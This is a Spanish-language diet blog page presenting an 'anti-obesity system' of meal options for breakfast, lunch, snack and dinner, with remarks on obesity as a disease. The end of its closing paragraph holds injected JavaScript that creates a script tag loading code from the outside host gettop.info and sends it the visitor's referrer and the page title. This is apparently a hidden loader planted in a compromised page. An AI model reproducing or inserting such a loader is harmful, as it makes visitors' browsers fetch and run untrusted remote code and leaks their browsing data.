Salud y belleza » Dieta

Sistema anti-obesidad

Sin Comentarios

El título de esta dieta puede sonar redundante, mas no lo es. Un plan nutricional no solo es ideado para bajar de peso, de hecho, en este mismo espacio, hemos descripto infinidad de dietas para llevar a cabo empresas dieferentes como subir de peso y también mantenerlo. De igual modo, existen dietas para controlar ciertas enfermedades y, la obesidad, efectivamente es una enfermedad. Muchos especialistas la definen como un sindrome metabólico por el cual se incrementan las reservas naturales de energía almacenadas en los tejidos adiposos. Está comprobado que la obesidad es un problema que, en determinados casos, puede llegar a ser fatal.

Por lo tanto, una dieta anti-obesidad nada tiene de obvio: más bien de específico.

Aquí presentamos un sistema excelente para combatir el sobrepeso y la obesidad, con un conjunto de alimentos (tres comidas al día) mediante los cuales tú mismo podrás idear tu propio plan.

  • Conjunto de opciones para el desayuno: infusión; rebanada de pan integral; una porción de queso magro.
  • Conjunto de opciones para la comida: caldo de verduras, ensalada de zanahoria rallada, tomate y brotes de soja, una fruta; ensalada de tomate y escarola, una gelatina diet;  ensalada de repollo colorado, lechuga y arvejas;  ensalada de lechuga y tomate y brócoli, una fruta; caldo de verduras, ensalada de palmitos y tomate, una fruta; ensalada de palmitos y tomates, revuelto de zapallitos con clara de huevo, una fruta; espagueti con salsa de tomate, helado.
  • Conjunto de opciones para la merienda: yogurt o una taza de leche descremada; tres cucharadas soperas de cereales sin azúcar.
  • Conjunto de opciones para la cena: bife de lomo chico, ensalada de manzana y remolacha, helado; caldo de verduras, pescado al horno con ensalada verde, una fruta; pollo a la parrilla, ensalada de apio y remolacha; aspic de frutas con gelatina diet, brocheta de pollo, ensalada Waldorf con crema, gelatina diet; ensalada verde, colita de cuadril al horno, postre pequeño; pescado a la cacerola con puré mixto (calabaza y espinaca), dos bolas de helado diet; caldo de verduras, guiso de verduras con carne, fruta.

La obesidad es una enfermedad que debe ser tratada muy en serio. Se registran más muertes por casos de un sobrepeso mal llevado que por muchas otras grandes enfermades y especialistas de la nutrición no tienen reparo en sostener que la comida, en ciertos individuos, se eleva casi como ciertas adicciones. Por lo tanto, nunca debemos dejarnos ganar ni por la compulsión ni por cualquier otro factor que nos aleje de una vida saludable. Con este plan, las bases están dadas para volver a las fuentes y comer de forma sana.var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.